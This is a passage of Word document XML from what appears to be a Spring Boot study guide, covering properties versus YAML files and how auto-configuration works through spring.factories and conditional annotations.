      </w:tr>
      <w:tr w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w14:paraId="7882DCFB" w14:textId="77777777" w:rsidTr="00A75DC8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48F2D246" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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adability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2679B5E0" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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mple for flat configs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2643222D" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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etter for nested structures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w14:paraId="2B25AC5A" w14:textId="77777777" w:rsidTr="00A75DC8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F6471B5" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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ofiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B6B1594" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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pported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3627AD07" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75D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eaner profile handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F51C51F" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A75D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D2D645">
          <v:rect id="_x0000_i2501" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F041A97" w14:textId="47CE0BA9" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75DC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t>
      </w:r>
      <w:r w:rsidR="00473617" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7CF503" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A75DC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You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>either</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Spring Boot reads application.properties and application.yml by default from:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7555B195" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A75DC8" w:rsidP="00A8060C">
      <w:pPr>
        <w:ind w:firstLine="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rc/main/resources/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A8BF9" w14:textId="77777777" w:rsidR="00A75DC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A75D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72D655">
          <v:rect id="_x0000_i2502" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62380313" w14:textId="06CCF762" w:rsidR="008C4546" w:rsidRPr="00CE4B95" w:rsidRDefault="008C4546" w:rsidP="008C4546">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="573" w:name="_Toc196308053"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring Boot auto-configuration work?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="573"/>
    </w:p>
    <w:p w14:paraId="19DADF19" w14:textId="5181F9EE" w:rsidR="008C4546" w:rsidRPr="00CE4B95" w:rsidRDefault="008C4546" w:rsidP="008C4546">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A0ECCED" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF734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How does Spring Boot Auto-Configuration work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D88B66" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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Boot’s auto-configuration feature is what makes it so powerful and easy to use — it automatically configures your application based on the dependencies present on the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22687FBB" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FF734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5C9FB1F">
          <v:rect id="_x0000_i2503" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8DAD7" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF734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In Simple Terms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF01C88" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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Boot looks at the JARs in your project, and auto-configures beans for you — so you don’t have to write boilerplate configuration code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C83709D" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FF734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0B3B897">
          <v:rect id="_x0000_i2504" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2983FD65" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF734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Key Components That Make It Work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CD4AC" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF734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EnableAutoConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6697A12D" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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is is part of @SpringBootApplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620F1B41" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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tells Spring Boot to start auto-configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B2EF50" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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499186"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@SpringBootApplicati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Includes @EnableAutoConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B93A93B" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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49918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App</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ACFF5C1" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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4991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713C53A" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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4991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pringApplica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u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MyApp</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clas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p>
    <w:p w14:paraId="4C823349" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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49918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C426993" w14:textId="781F3FDC" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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499186"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD55FEE" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FF734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9BD5B16">
          <v:rect id="_x0000_i2505" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CE0EDE" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF734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spring.factories (or spring/org.springframework.boot.autoconfigure.AutoConfiguration.imports in Spring Boot 3+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D3995" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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und inside the Spring Boot JARs (like spring-boot-autoconfigure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736E84A" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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s all the auto-configuration classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA91362" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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3086618"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># META-INF/spring.factories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63594EDF" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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3086618"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>or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pringframewor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oo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utoconfigure</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EnableAutoConfigura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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433AAA8" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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3086618"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>or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pringframewor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oo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utoconfigur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jdbc</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DataSourceAutoConfigura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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D26F393" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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3086618"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>or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pringframewor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oo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utoconfigur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we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ervle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WebMvcAutoConfigura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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC08C95" w14:textId="1C0E9BEF" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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3086618"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C7E0A" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FF734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05C39DB">
          <v:rect id="_x0000_i2506" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4C1D86" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF7345">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Conditional Annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161579FF" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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Boot only configures what you need, using annotations like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F5D6B8" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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ditionalOnClass → If a class is on the classpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B3BB2" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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ditionalOnMissingBean → Only create if a bean is missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356DCFE4" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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ConditionalOnProperty → Based on values in application.properties/yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CD2875" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF7345">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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A07D362" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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3717594"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794531A3" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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3717594"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@ConditionalOnClass</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DataSource</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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8E2EA7" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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3717594"/>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DataSourceAutoConfigurati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FA0A0FF" w14:textId="77777777" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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371759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ets up a DataSource bean if JDBC is on the classpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8B7B83" w14:textId="4C79A3D1" w:rsidR="00633FD4" w:rsidRPr="00CE4B95"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3717594"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A83567" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FF734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243864">
          <v:rect id="_x0000_i2507" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B157A98" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF734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 in Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D12AE" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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you add this dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1695A" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00633FD4">
      <w:pPr>
        <w:ind w:firstLine="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lementation 'spring-boot-starter-web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F3954F" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B3DBF4" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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tects Spring MVC is needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D09FAD5" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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uto-configures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E87308" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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ispatcherServlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A91AF7B" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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mbedded Tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5205D6A7" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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ckson for JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45089DC2" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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fault error pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7698F430" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29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gging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DCD809" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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l without you writing any config!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758C231" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FF734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193FFC9">
          <v:rect id="_x0000_i2508" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E7B02" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF7345">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Can You Override Auto-Config?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361F82E" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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es! You can override it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AF1AD" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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fine your own @Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57964227" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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ConditionalOnMissingBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A74B6DF" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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isable specific auto-configs using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D3206" w14:textId="70DA7363" w:rsidR="00C16412" w:rsidRPr="00CE4B95" w:rsidRDefault="00C164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199150"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
